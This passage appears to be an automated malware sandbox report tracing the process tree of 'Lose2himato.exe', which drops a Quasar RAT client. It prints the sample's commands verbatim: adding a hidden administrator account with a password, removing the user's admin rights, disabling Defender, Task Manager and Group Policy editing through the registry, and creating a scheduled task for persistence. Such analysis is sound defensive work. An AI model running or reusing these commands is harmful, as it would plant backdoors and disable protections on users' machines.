  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3988 /prefetch:1
  2⤵
  PID:2748
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5324 /prefetch:8
  2⤵
  PID:2408
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5324 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
  2⤵
  PID:4948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:1
  2⤵
  PID:2696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
  2⤵
  PID:2700
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:1
  2⤵
  PID:3952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6056 /prefetch:8
  2⤵
  PID:1280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6376 /prefetch:8
  2⤵
  PID:1984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6528 /prefetch:1
  2⤵
  PID:3476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:1
  2⤵
  PID:4300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,7051264140820129255,312489670895018747,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5312 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5336
- C:\Users\Admin\Downloads\Lose2himato.exe
  "C:\Users\Admin\Downloads\Lose2himato.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  PID:5536
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net user OWN3DbyHXM4TO /add
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5924
  - - C:\Windows\SysWOW64\net.exe
      net user OWN3DbyHXM4TO /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:6136
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user OWN3DbyHXM4TO /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4256
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net user OWN3DbyHXM4TO Test
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6020
  - - C:\Windows\SysWOW64\net.exe
      net user OWN3DbyHXM4TO Test
      4⤵
      PID:5688
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user OWN3DbyHXM4TO Test
        5⤵
        
        PID:5944
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "OWN3DbyHXM4TO" /add
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6124
  - - C:\Windows\SysWOW64\net.exe
      net localgroup Administrators "OWN3DbyHXM4TO" /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:5732
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators "OWN3DbyHXM4TO" /add
        5⤵
        
        PID:6016
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "%USERNAME%" /delete
    3⤵
    - Indicator Removal: Network Share Connection Removal
    - System Location Discovery: System Language Discovery
    PID:5160
  - - C:\Windows\SysWOW64\net.exe
      net localgroup Administrators "Admin" /delete
      4⤵
      System Location Discovery: System Language Discovery
      PID:5312
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators "Admin" /delete
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5320
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5240
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5436
- - C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\better.exe
    "C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\better.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    PID:5268
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6068
  - - C:\Windows\system32\SubDir\Client.exe
      "C:\Windows\system32\SubDir\Client.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:4316
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6120
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1iphg2tV82MV.bat" "
        5⤵
        
        PID:4780
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:5052
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2884
      - C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2236
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3692
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\3vQIGCTm5CD9.bat" "
        7⤵
        
        PID:5332
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:4068
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2668
        
        C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:1736
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1924
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kms9ww0RiS6q.bat" "
        9⤵
        
        PID:6100
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:3340
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1004
        
        C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:2816
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        11⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5228
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CvyZ04unJMBd.bat" "
        11⤵
        
        PID:840
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        12⤵
        
        PID:976
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5700
        
        C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:1900
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        13⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3868
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c0d2FGEivyf3.bat" "
        13⤵
        
        PID:6024
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        14⤵
        
        PID:3860
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        14⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1932
        
        C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:5460
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        15⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1752
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EDbjkhnbx7Hj.bat" "
        15⤵
        
        PID:5196
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        16⤵
        
        PID:4992
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        16⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5184
        
        C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        16⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:5256
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        17⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5656
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5n0BCiDf3EUm.bat" "
        17⤵
        
        PID:5448
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        18⤵
        
        PID:2752
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        18⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1704
        
        C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        18⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:5576
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        19⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4980
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iGVh5Fhlmdb5.bat" "
        19⤵
        
        PID:5148
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        20⤵
        
        PID:5500
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        20⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5160
        
        C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        20⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:4140
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        21⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4692
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Lfkn0bR7YCTv.bat" "
        21⤵
        
        PID:6036
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        22⤵
        
        PID:5564
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        22⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4004
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1180
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5732
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5804
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5280
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5668
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      4⤵
      PID:5312
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5476
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
      4⤵
      PID:5316
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start https://x.com/Lose2hxm4to
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2152
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://x.com/Lose2hxm4to
      4⤵
      PID:4696
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffae5c746f8,0x7ffae5c74708,0x7ffae5c74718
        5⤵
        
        PID:5720
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start https://discord.gg/8eGVMdaD
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5440
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/8eGVMdaD
      4⤵
      PID:5488
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf4,0x128,0x7ffae5c746f8,0x7ffae5c74708,0x7ffae5c74718
        5⤵
        
        PID:4404
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c shutdown /r
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2608
  - - C:\Windows\SysWOW64\shutdown.exe
      shutdown /r
      4⤵
      System Location Discovery: System Language Discovery
      PID:3116
- C:\Users\Admin\Downloads\Lose2himato.exe
  "C:\Users\Admin\Downloads\Lose2himato.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Sets desktop wallpaper using registry
  - System Location Discovery: System Language Discovery
  PID:5760
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net user OWN3DbyHXM4TO /add
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5916
  - - C:\Windows\SysWOW64\net.exe
      net user OWN3DbyHXM4TO /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:5636
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user OWN3DbyHXM4TO /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1636
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net user OWN3DbyHXM4TO Test
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5988
  - - C:\Windows\SysWOW64\net.exe
      net user OWN3DbyHXM4TO Test
      4⤵
      System Location Discovery: System Language Discovery
      PID:5584
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user OWN3DbyHXM4TO Test
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1416
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "OWN3DbyHXM4TO" /add
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6060
  - - C:\Windows\SysWOW64\net.exe
      net localgroup Administrators "OWN3DbyHXM4TO" /add
      4⤵
      System Location Discovery: System Language Discovery
      PID:5712
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators "OWN3DbyHXM4TO" /add
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5872
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "%USERNAME%" /delete
    3⤵
    - Indicator Removal: Network Share Connection Removal
    - System Location Discovery: System Language Discovery
    PID:2636
  - - C:\Windows\SysWOW64\net.exe
      net localgroup Administrators "Admin" /delete
      4⤵
      System Location Discovery: System Language Discovery
      PID:5744
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators "Admin" /delete
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5804
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1828
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:5360
- - C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\better.exe
    "C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\better.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    PID:5692
  - - C:\Windows\SYSTEM32\schtasks.exe
      "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:6120
  - - C:\Windows\system32\SubDir\Client.exe
      "C:\Windows\system32\SubDir\Client.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SendNotifyMessage
      PID:3860
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5356
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aCMBds5ojfsL.bat" "
        5⤵
        
        PID:4140
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:5856
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:408
      - C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:5716
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5960
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\VPvENdldavBs.bat" "
        7⤵
        
        PID:884
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:2956
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        8⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:5412
        
        C:\Windows\system32\SubDir\Client.exe
        
        "C:\Windows\system32\SubDir\Client.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SendNotifyMessage
        
        PID:4336
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3884
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\umFV0DNchysV.bat" "
        9⤵
        
        PID:3760
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        10⤵
        
        PID:1616
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        10⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:408
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
    3⤵
    PID:1496
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
      4⤵
      PID:6120
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4600
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:2280
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
